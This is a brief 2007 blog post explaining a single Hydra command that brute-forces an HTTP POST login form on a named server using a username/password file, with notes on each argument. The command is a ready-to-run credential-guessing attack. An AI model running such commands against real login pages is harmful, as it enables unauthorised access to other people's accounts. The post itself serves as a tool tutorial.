Analytic

Tuesday, September 25, 2007

An example for HYDRA!!

./hydra -C user.txt jost.connectaserver.de http-post-form "/test_check.php:login=^PASS^:access denied"

Comments:

./hydra -C (username and password file)
jost.connectaserver.de (Server name)
http-post-form (Service Type)
"1-/test_check.php:2-login=^PASS^:3-access denied"
1-the page on the server to GET or POST to
2-the POST/GET variables (taken from either the browser, or a proxy such as PAROS) with the varying usernames
and passwords in the "^USER^" and "^PASS^" placeholders
3-the string that it checks for an *invalid* login - any exception to this is counted as a success.

No comments: